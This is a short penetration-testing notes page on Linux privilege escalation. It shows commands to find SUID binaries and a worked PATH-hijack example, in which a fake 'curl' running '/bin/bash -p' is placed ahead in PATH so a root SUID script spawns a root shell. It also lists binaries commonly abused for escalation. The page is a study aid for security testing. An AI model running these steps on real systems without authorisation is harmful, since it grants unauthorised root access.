Path Variable Manipulation

What is SUID, SGID, and Sticky bits?

Search system for types of files with SUID bits

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

Verify file has SUID bit

ls -l /usr/file/test
# Example Output:
# -rwsr-xr-x 1 root root 8880 Sep 4 2019 /usr/file/test

Example of exploit

We find a script that has SUID bit, which runs curl upon call. Create a binary called curl that gives you a bash shell, then modify the user's PATH to use your created curl which running the script will give you a root bash shell.

# Verify file has SUID bit
ls -l /usr/bin/script
# Output:
# -rwsr-xr-x 1 root root 8880 Sep 4 2019 /usr/bin/script

# Create binary called curl
echo "/bin/bash -p" > /home/user/curl
chmod +x /home/user/curl

#Modify $PATH
echo $PATH
export PATH=/home/user:$PATH
echo $PATH

# Running exploit
/usr/bin/script

What are typical SUID files? (not cp)

Research against https://gtfobins.github.io/ to find a vulnerable service. You could also use LinEnum or LinPeas to automate Piv Esc.

Common SUID to Priv Esc:

Nmap
Vim
find
Bash
More
Less
Nano
cp

PreviousLinux Priv Escalate NextSystemctl

Last updated 5 years ago

hashtagWhat is SUID, SGID, and Sticky bits?

hashtagSearch system for types of files with SUID bits

hashtagVerify file has SUID bit

hashtagExample of exploit

What is SUID, SGID, and Sticky bits?

Search system for types of files with SUID bits

Verify file has SUID bit

Example of exploit